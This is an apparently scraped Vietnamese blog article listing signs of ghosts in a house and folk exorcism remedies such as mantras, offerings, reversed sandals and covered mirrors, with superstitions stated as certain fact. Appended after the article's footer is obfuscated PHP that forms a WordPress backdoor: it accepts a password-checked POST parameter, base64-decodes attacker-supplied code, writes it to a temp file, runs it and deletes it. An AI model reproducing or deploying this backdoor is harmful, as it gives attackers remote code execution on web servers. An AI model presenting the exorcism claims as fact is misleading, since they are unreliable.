Cách trừ tà hiệu quả ai cũng nên biết để gia đình bình an

- Xem(589)

Theo quan điểm tâm linh đội khi chúng ta vẫn thường gặp các trường hợp bóng đè, gặp ma…vậy đâu là cách trừ tà hiệu quả để giúp mang lại cuộc sống bình an cho mỗi người. Cùng tìm hiểu chi tiết qua bài viết dưới đây. 

1. Dấu nhận biết có tà ma trong nhà

Trước tiên để có thể biết được về cách trừ tà hiệu quả thì chúng ta cần phải biết được những dấu hiệu trong nhà có tà ma là như thế nào. Chúng ta sẽ cùng nhìn vào những dấu hiệu cụ thể như sau :

1.1. Cảm nhận nhiệt độ thay đổi thất thường

Bỗng nhiên cảm thấy nhiệt độ trong phòng thay đổi bất thường chính là dấu hiệu của tà khí, cụ thể nếu bạn cảm nhận nhiệt độ phòng ngủ giảm đột ngột, cảm giác rất lạnh mặc dù nhiệt độ bên ngoài không quá thấp, đồng thời khoảng thời gian này lặp lại đều đặn thì chắc chắn bạn đang “có người viếng thăm”

Cách trừ tà hiệu quả nhất
Cách trừ tà hiệu quả nhất

Lưu ý khoảng thời gian thường có cảm giác này là buổi chiều khi mặt trời lặn, khoảng 18 giờ, các bạn có thể dễ dàng cảm nhận vì đây là thời điểm mà các linh hồn bắt đầu lang thang, di chuyển trong ngôi nhà.

1.2. Có tiếng chó sủa

Bỗng nhiên cún cưng nhà bạn sủa rất nhiều, liên tục trong một khoảng không vô định, không thấy bất kỳ ai, hay con vật nào thì hãy cân nhắc, có thể là dấu hiệu ma quỷ xuất hiện.

1.3. Những cái bóng lạ thường

Tự nhiên cảm nhận được những bóng đen thấp thoáng, thoắt ẩn, thoắt hiện ngoài cửa sổ nhưng khi ra nhìn lại không thấy thì đó có thể chính là dấu hiệu có “người khuất mặt” ghé thăm.

1.4.Trẻ nhỏ thay đổi biểu cảm, ánh mắt

Trẻ nhỏ thường rất ngây thơ và không có ý thức về hồn ma, người đã khuất. Do đó, chúng dễ dàng nhìn thấy ma quỷ hơn người lớn rất nhiều. Bởi thế nếu để ý thấy con bạn bỗng nhiên bật khóc thét lên khi nhìn chằm chằm vào khoảng không vô định, đồng htowfi sẽ cảm thấy sợ hãi tột độ, co rút người lại thì bố mẹ cần phải chắc chắn là bé đang nhìn thấy ma.

1.5. Tiếng động lạ xuất hiện thường xuyên

Đột nhiên nghe thấy tiếng động lạ như là tiếng bước chân, tiếng vặn cửa, tiếng thì thầm hoặc tiếng khóc thút thít thì chắc hẳn đang có oan hồn ẩn nấp đau đây. Lúc này hãy tìm cách trừ tà hiệu quả nhất để cuộc sống được bình an.

1.6.Cảm giác có người theo dõi mình

Nếu đột nhiên có cảm giác có người đang nhìn chằm chằm vào mình thì rất có thể hiện bạn sống cùng với ma đấy. Đặc biệt là vào ban đêm.

2. Cách trừ tà hiệu quả theo từng trường hợp cụ thể

Tìm hiểu cách trừ tà hiệu quả nhất chúng ta sẽ cần áp dụng vào từng trường hợp cụ thể khác nhau. Bởi thế chúng ta có thể phòng ngừa và tiêu diệt tà khí trong nhà. Chi tiết từng cách trừ tà hiệu quả cho từng trường hợp cụ thể như sau.

2.1. Cách trừ ta hiệu quả khi bị bóng đè

Đối với trường hợp bị bóng đè khi ngủ thì chúng ta sẽ chỉ có một cách thoát khỏi duy nhất đó chính là niệm thần chú. Cụ thể nếu gặp phải trường hợp khó thở, có cảm giác một vật nặng đề lên người trong lúc ngủ, đồng thời khi đó tiềm thức của bạn cho bạn cho biết rằng hiện bạn đang bị bóng đen đè nặng khi đó hãy đọc câu thần chú “Án ma ni bát mê hồng” đây chính là câu thần chú bạn cần học thuộc và nằm lòng để thoát khỏi bóng đè.

2.2. Cách trừ tà khi nghe tiếng ma khóc trong lùm cây hiệu quả

Nếu bạn gặp phải trường hợp nghe thấy tiếng ma khóc trong lùm cây quanh nhà hoặc nghe thấy tiếng nói chuyện thì thầm trong phòng thì cần ngay lập tức tìm cách trừ ma quỷ trong nhà. Hãy tiến hành sớm trước khi tình trạng này trở nên xấu hơn.

Cách trừ tà hiệu quả trong trường hợp này là tiến hành cúng bái với trái cây và hoa, trả quả nếu cứ nghe thấy tiếng khóc thút thít bên ngoài lùm cây. Đây là cách tuy đơn giản nhưng có hiệu quả dài lâu, hãy áp dụng để có được cuộc sống bình yên không bị quấy phá về đêm.

2.3. Cách trừ tà khi cứ nghe thấy tiếng bước chân phía sau

Nếu khi đang ở nhà một mình chắc hẳn không ít người tự nhiên có cảm giác có ai đó đang theo dõi mình phía sau, đó chính là cảm giác có ai đó đang đi theo mình. Đặc biệt là khi bạn ở trong phòng ngủ, hay khi ở nhà một mình. Vậy cách trừ tà hiệu quả trong trường hợp này chính là hạ thấp gót chân và tuyệt đối không được quay đầu lại.

Có nhiều người nghe tiếng bước chân và nghe ai đó gọi tên mình, mặc dù trong nhà không có ai. Lúc này bạn chỉ nên im lặng và tiến về phía trước, không được lên tiếng hay quay lại nhìn, đồng thời nắm chặt hai bàn tay để tránh bị ma dắt đi.

2.4. Cách xua đuổi ma quỷ khi ở phòng lạ có ma

Nhiều thời điểm bạn đi du lịch hoặc tới nhà người khác chơi và ngủ lại qua đêm hay ngủ ngoài khách sạn mà bạn cảm thấy gặp ma thì thường để ý đến người lạ. Khi đó bạn cần biết cách hoải giải tà ma càng sớm, càng tốt để có thể tận hưởng chuyến đi thoải mái. Hãy áp dụng cách đặt đội dép của mình dưới sần nhà theo kiểu ngược với nhau. 1 chiếc quay ra và 1 chiếc quay vào. Cách này giúp đánh lừa các vong hồn rằng không có ai đang ngủ trên giường.

2.5. Cách xua đuổi khi thấy ma trong gương

Trong nhiều trường hợp bạn chải tóc vào ban đêm và có thể sẽ nhìn thấy những hình bóng thấp thoáng sau lưng, đây có thể là người đang nhìn và theo dõi bạn đấy. Tuyệt đối đừng chủ quan mà bỏ qua linh cảm cực nhạy bén này nhé.

Lúc này bạn hãy áp dụng cách trừ tà ma hiệu quả đó là úp dương xuống và đặt chiếc lược nằm ngang lên trên. Trường hợp nếu gương treo tường thì hãy dùng miếng vải hoặc vật gì đó để che hết lại. Đồng thời thắm nước bọt lên tay và viết chữ thập ở giữa gương để tránh ma quỷ ra ngoài.

Bài viết trên đây đã cập nhật câu trở lời cho cách trừ tà hiệu quả nhất trong những trường hợp cụ thể. Chúc các bạn luôn có cuộc sống bình an.

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}